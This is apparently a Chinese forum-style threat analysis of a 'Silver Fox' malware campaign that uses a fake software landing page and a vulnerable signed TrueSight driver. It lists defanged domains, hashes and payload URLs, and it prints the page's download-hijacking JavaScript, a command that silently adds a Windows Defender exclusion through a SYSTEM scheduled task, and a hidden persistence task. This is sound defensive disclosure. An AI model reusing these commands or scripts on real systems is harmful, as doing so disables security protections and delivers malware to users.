具体请参考
https://www.52pojie.cn/thread-2124432-1-1.html
简称或我个人俗称银狐组织诺亚S落地页,白加黑漏驱利用
静态步骤( by SYSTEM-RAMOS-ZDY)
1 资源管理器,地址栏,输入(%windir%\System32\Codeintegrity)并回车
2 找到WDCP策略文件(SiPolicy.p7b)并删除
3 立即创建(SiPolicy.p7b)同名文件夹
4 输入(%windir%\System32\tasks)并回车
5 删除(最新日期/随机字符)任务计划文件
6 开始菜单任意位置,输入(taskschd.msc)并回车
7 检查任务计划列表,刚才(随机字符)任务是否已被移除
8 如果没有移除。选中(随机字符)任务并右键(删除)
9 重启电脑,此时病毒理论上不会开机自启,杀毒软件也可以正常运行了
0 立即启动任意有效杀毒软件,进行全盘扫描,对银狐病毒内容进行查杀
如果是公司,请立即报告技术人员,谨防更深入的横向感染或窃密勒索
外壳站群
域 名 win-hance[.]com[.]cn
注册商 北京新网数码信息技术有限公司
注册人 5b6Q5pa55p2w
邮 箱 YWxpcmV6YWpvYmUxNzFAZ21haWwuY29t
省/州 四川(sichuansheng)
地 区 中国(CN)
注册日 2026-07-11 22:01:40 UTC+8
过期日 2027-07-11 22:01:40 UTC+8
状 态 正常
DNS ns1[.]363[.]hk
ns2[.]363[.]hk
DNSSEC 未配置
落地通信
域 名 noah-ssh[.]com[.]cn
注册商 Web Commerce Communications Limited
注册人 5LmU6JOJ6JOJ
邮 箱 Mzg3NzA5ODg2NUBxcS5jb20=
注册日 2026-08-10 17:05:04 UTC+8
过期日 2027-08-10 17:05:04 UTC+8
状 态 客户端禁止转移
DNS a9[.]share-dns[.]com
b9[.]share-dns[.]net
DNSSEC 未配置
落地中继
域 名 workers[.]dev
注册商 CloudFlare, Inc.
注册人 CloudFlare, Inc.
邮 箱
省/州 加利福尼亚州(CA)
地 区 美国(US)
电 话 +1. NDE1MzE5NzUxNw==
注册日 2019-02-09 04:36:47 UTC+8
过期日 2027-02-09 04:36:47 UTC+8
更新日 2025-11-16 20:00:30 UTC+8
IANA_ID 1910
状 态 客户端禁止删除
客户端禁止转移
客户端禁止更新
DNS clyde[.]ns.cloudflare[.]com
sofia[.]ns.cloudflare[.]com
DNSSEC 未配置
下载服务
域 名 dvl51m[.]com
注册商 Dynadot Inc
注册人
邮 箱
注册日 2026-08-22 09:49:30 UTC+8
过期日 2027-08-22 09:49:30 UTC+8
更新日 2026-08-22 09:49:43 UTC+8
IANA_ID 472
状 态 客户端禁止转移
DNS ns1[.]dyna-ns[.]net
ns2[.]dyna-ns[.]net
DNSSEC 未配置
文件指纹
install_q0.3.03.exe
大小: 27057152 字节 : 25 MiB
CRC32: 5B2586DF
CRC64: FE5B014FDF5C3C2F
XXH64: AAD2AAD3D9E9031F
SHA256: ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
SHA3-256: ef8773ba5f0c176587e52ec09d41f7dfb04352f2ac12e575d6b7ea882523cfd4
tad
a.gif
b.gif
c.gif
d.gif
s.jpg
s.dat
f.dat
t2t.jpg
ooo.jpg
drops.jpg
暂未哈希
ranchserv.sys b(指纹不固定,银狐创建了数不清的变体)
大小: 28272 字节 : 27 KiB
CRC32: 4ECA46C5
CRC64: DDA9C0BB88D4955C
XXH64: B9D9C01AF8711ECE
SHA256: a4b6ba74a225a56de063de34b4645ae67588024d0447c5310a576eeeac25b119
SHA3-256: 3545d72b30be4642f5581328f40107fc7cd04bc4856e8e4f7b6ff5e9a2de86f8
火绒扫描(我自己的本地扫描结果)
6.0.11.3 版本
08-28 19:43 病毒库
2026/08/27 22:03:02 b
病毒防护
文件实时监控
发现病毒Exploit/TrueSight.a, 已处理
病毒名称:Exploit/TrueSight.a
病毒ID:154AA1F46F586081
病毒路径:ranchserv.sys
操作类型:修改
操作结果:已处理,删除文件
2026/08/28 22:58:07
2026/08/28 23:11:45
病毒防护
下载保护
文件实时监控
发现病毒HVM:Trojan/Injector.dn, 已处理
病毒名称:HVM:Trojan/Injector.dn
病毒ID:F8E1D1ED7850A458
病毒路径:install_q0.3.03.exe
操作类型:修改
操作结果:已处理,删除文件
外联统计
<script charset="UTF-8" id="LA_COLLECT" src="//sdk[.]51[.]la/js-sdk-pro.min.js"></script>
LA.init({
id: "3QeItG2289rS1l5O",
ck: "3QeItG2289rS1l5O"
})
核心脚本
(function(){
var burger=document.getElementById('cgBurger'),menu=document.getElementById('cgMenu');
if(burger){burger.addEventListener('click',function(){menu.classList.toggle('cg-menu-open')});}
var faqs=document.querySelectorAll('.cg-faq-item');
faqs.forEach(function(f){f.querySelector('.cg-faq-q').addEventListener('click',function(){f.classList.toggle('open')})});
fetch('https://noah-sk[.]com/api.php')
.then(function(res){return res.json()})
.then(function(data){
if(data.code===0 && data.download_link){
document.querySelectorAll('.wh-download-btn').forEach(function(btn){btn.setAttribute('href',data.download_link);btn.setAttribute('target','_blank');btn.setAttribute('rel','noopener noreferrer');});
}
}).catch(function(){});
})();
(function () {
var DISCOVERY = [
'https://noah-ssh[.]com[.]cn/relays.json',
'https://noah-relay[.]wotudj578[.]workers[.]dev',
'https://noah-relay2[.]wotudj578[.]workers[.]dev'
];
var POOL_KEY = 'noah_relay_pool';
var LINK = '';
var resolving = false;
var NOAH_DL_REV = 'r6';
function targets() {
var list = document.querySelectorAll('[data-download]');
if (list.length) return list;
var all = document.querySelectorAll('a, button');
var picked = [];
for (var i = 0; i < all.length; i++) {
var t = (all[i].textContent || '').replace(/\s+/g, '');
if (/下载|立即下载|免费下载|电脑版|^download$/i.test(t)) picked.push(all[i]);
}
return picked;
}
function startDownload(url) {
if (!url) return;
try {
var a = document.createElement('a');
a.href = url;
a.rel = 'noopener noreferrer';
a.referrerPolicy = 'no-referrer';
a.style.display = 'none';
document.body.appendChild(a);
a.click();
setTimeout(function () { try { a.parentNode.removeChild(a); } catch (e) {} }, 1500);
} catch (e) {
try { window.location.href = url; } catch (e2) {}
}
}
function onClick(ev) {
if (ev) { ev.preventDefault(); ev.stopPropagation(); }
if (LINK) { startDownload(LINK); return false; }
resolve(function () { if (LINK) startDownload(LINK); });
return false;
}
function bind() {
var list = targets();
for (var i = 0; i < list.length; i++) {
var el = list[i];
if (el.__noahBound) continue;
el.__noahBound = true;
if (el.tagName === 'A') el.setAttribute('href', 'javascript:void(0)');
el.style.cursor = 'pointer';
el.addEventListener('click', onClick, false);
}
}
function getCachedPool() {
try {
var o = JSON.parse(localStorage.getItem(POOL_KEY) || 'null');
if (o && o.relays && o.relays.length) return o;
} catch (e) {}
return null;
}
function fetchLink(relays, i, done) {
if (!relays || i >= relays.length) { if (done) done(); return; }
var ctrl = new AbortController();
var timer = setTimeout(function () { ctrl.abort(); }, 2500);
fetch(relays[i].replace(/\/+$/, '') + '/api.php?t=' + Date.now(), { signal: ctrl.signal, cache: 'no-store' })
.then(function (r) { return r.ok ? r.json() : Promise.reject(); })
.then(function (data) {
clearTimeout(timer);
if (data && data.download_link) { LINK = data.download_link; bind(); if (done) done(); }
else fetchLink(relays, i + 1, done);
})
.catch(function () { clearTimeout(timer); fetchLink(relays, i + 1, done); });
}
function discover(i, onDone) {
if (i >= DISCOVERY.length) { onDone(null); return; }
var ctrl = new AbortController();
var timer = setTimeout(function () { ctrl.abort(); }, 3000);
fetch(DISCOVERY[i] + (DISCOVERY[i].indexOf('?') >= 0 ? '&' : '?') + '_=' + Date.now(), { signal: ctrl.signal, cache: 'no-store' })
.then(function (r) { return r.ok ? r.json() : Promise.reject(); })
.then(function (pkg) {
clearTimeout(timer);
var data = pkg && pkg.data ? pkg.data : pkg;
if (data && data.relays && data.relays.length) {
try { localStorage.setItem(POOL_KEY, JSON.stringify(data)); } catch (e) {}
onDone(data);
} else { discover(i + 1, onDone); }
})
.catch(function () { clearTimeout(timer); discover(i + 1, onDone); });
}
function resolve(done) {
if (resolving) { if (done) setTimeout(done, 800); return; }
resolving = true;
discover(0, function (fresh) {
var pool = fresh || getCachedPool();
if (pool) fetchLink(pool.relays, 0, function () { resolving = false; if (done) done(); });
else { resolving = false; if (done) done(); }
});
}
if (document.readyState === 'loading') {
document.addEventListener('DOMContentLoaded', bind);
} else {
bind();
}
resolve();
})();
落地通信
https://noah-ssh[.]com[.]cn/relays.json?_=1787929050191
{
"data": {
"v": 1786523551,
"updated_at": 1786523551,
"relays": [
"https://noah-ssh[.]com[.]cn",
"https://noah-relay[.]wotudj578[.]workers[.]dev",
"https://noah-relay2[.]wotudj578[.]workers[.]dev"
]
},
"sig": ""
}
落地中继
https://noah-relay[.]wotudj578[.]workers.dev
https://noah-relay[.]wotudj578[.]workers.dev/relays.json?_=1787603702460
{
"data": {
"v": 1,
"updated at": 1,
"relays": [
"https://noah-ssh[.]com[.]cn",
"https://noah-re1ay2[.]wotudj578[.]workers[.]dev"
]
},
"sig": ""
}
下载赋值
https://noah-ssh[.]com[.]cn/api.php?t=1787929050797
{
"download_link": "https://www[.]dvl51m[.]com/insdw62"
}
落地信息
https://noah-ssh[.]com[.]cn/admin
403 Forbidden:当前 IP 不在管理白名单(0.0.0.0)
后台参考
https://www.bilibili.com/video/BV1ebEh6bEU3
https://www.bilibili.com/video/BV1663n6dEaJ
银狐SK落地页(其中之一)后台参考
弱密码,现在已经添加IP登录白名单
文件属性
x64 - Zip Sfx Archive ,
Overlay : ZIP archive > Offset : 0000h - [ Deflated ]
调试符号
No PDB
参考编译
Visual C++ (CodeView)
VC Feature.
POGO
编译时间
2016-08-15 03:15:56
类型
应用程序
大小
25.8 MB
参考名称
sfxzip.exe
文件说明
文件版本
产品名称
产品版本
版权
语言
Null
区段
.text
.rdata
.data
.pdata
.gfids
.rsrc
.reloc
叠加层
尝试解压
---------------------------
7-Zip
---------------------------
无法作为压缩包打开文件「install_q0.3.03.exe」
---------------------------
确定
---------------------------
---------------------------
错误
---------------------------
install_q0.3.03.exe
这个压缩文件格式未知或者数据已经被损坏
---------------------------
确定
---------------------------
基础解压
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="*"
name="WinRAR SFX"
type="win32"/>
<description>WinRAR SFX module</description>
漏驱数签
Adlice
2016 年 01 月 16 日,04 点 18 分 03 秒
DigiCert High Assurance Code Signing CA-1 签发
SHA1 摘要算法,RSA 摘要加密算法
证书序列号:06 e2 84 cd 38 ee 15 62 30 95 dc bd 38 e6 5f 9b
漏驱参考
x64 Native - System driver ( .sys ) [ Visual Studio .9.00 - 2008 ] [ Driver file via PDB ]- CPU : AMD x64 [SigneD] [ Win 7 ] ,
Overlay : Signed - Name : Antirootkit module.
调试符号
c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb
编译时间
2016-01-16 04:17:58
文件说明
Antirootkit module
类型
系统文件
文件版本
2.0.2.0
产品名称
Truesight
版权
Copyright Adlice Software(C) 2014
大小
27.6 KB
语言
法语(法国)
原始文件名
Truesight
恶意载荷
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/tad
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/a.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/b.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/c.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/d.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/s.jpg
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/s.dat
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/f.dat
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/t2t.jpg
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/ooo.jpg
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/drops.jpg
释放文件
C:\Windows\Temp\ranchserv.jpg
C:\Users\Public\KSzNU8\msadox.tb
C:\Users\Public\KSzNU8\yE3scs.exe
C:\Users\Public\KSzNU8\adoresd.dat
C:\Users\Public\KSzNU8\checktime.vbs
C:\Users\Public\KSzNU8\UxEnhance64.dll
杀软排除
cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
计划任务
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Description/>
<URI>\</URI>
</RegistrationInfo>
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
</LogonTrigger>
<TimeTrigger>
<Repetition>
<Interval>PT1M</Interval>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2009-04-23T00:00:00</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<GroupId>S-1-5-32-545</GroupId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>4</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Users\Public\WzL5ss\7Ava8Z.exe</Command>
<WorkingDirectory>C:\Users\Public\WzL5ss\</WorkingDirectory>
<Arguments />
</Exec>
</Actions>
</Task>
外壳站群
https://s.threatbook.com/report/url/57a2e61cef1390bbf25114d30d002725
落地通信
https://s.threatbook.com/report/url/df9d4a9a92cc68ead43b39fc693dd855
https://s.threatbook.com/report/url/1efc8e221e3a2b53c5aeeeae7d02b741
落地中继
https://s.threatbook.com/report/url/cd2e3dfe1a22e443f5168f83d093d718
https://s.threatbook.com/report/url/3bb188ac541188419501bc9755fb2426
落地后台
https://s.threatbook.com/report/url/0c05472d46527af9da348b9eb80b3c74
下载赋值
https://s.threatbook.com/report/url/8f1a3e2557553d7ac0f2bb0aaf84d64e
样本情况
https://virusscan.jotti.org/zh-CN/filescanjob/91mkzo317f
https://tix.qq.com/search/single?keyword=238eebfbb077db8d3239a314d8639f38
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaBI89323vNfIaDFK5kr
https://sandbox.dbappsecurity.com.cn/report/39bf13de-83e1-44f4-97ac-b59a8f4473cd/flat
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMzA2ODY3ZHNmYXNkZmFzZGY=/
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=238eebfbb077db8d3239a314d8639f38
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=238eebfbb077db8d3239a314d8639f38
https://www.virscan.org/report/ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
https://www.virustotal.com/gui/file/ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
https://s.threatbook.com/report/file/ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=e348fcca7a4c24802b464cdbaa477516&sk=48476090
https://opentip.kaspersky.com/CE6860927721F12382013001EAEB6EF30E2BCCE1C201F043C0AB578D033F01FD/results?tab=upload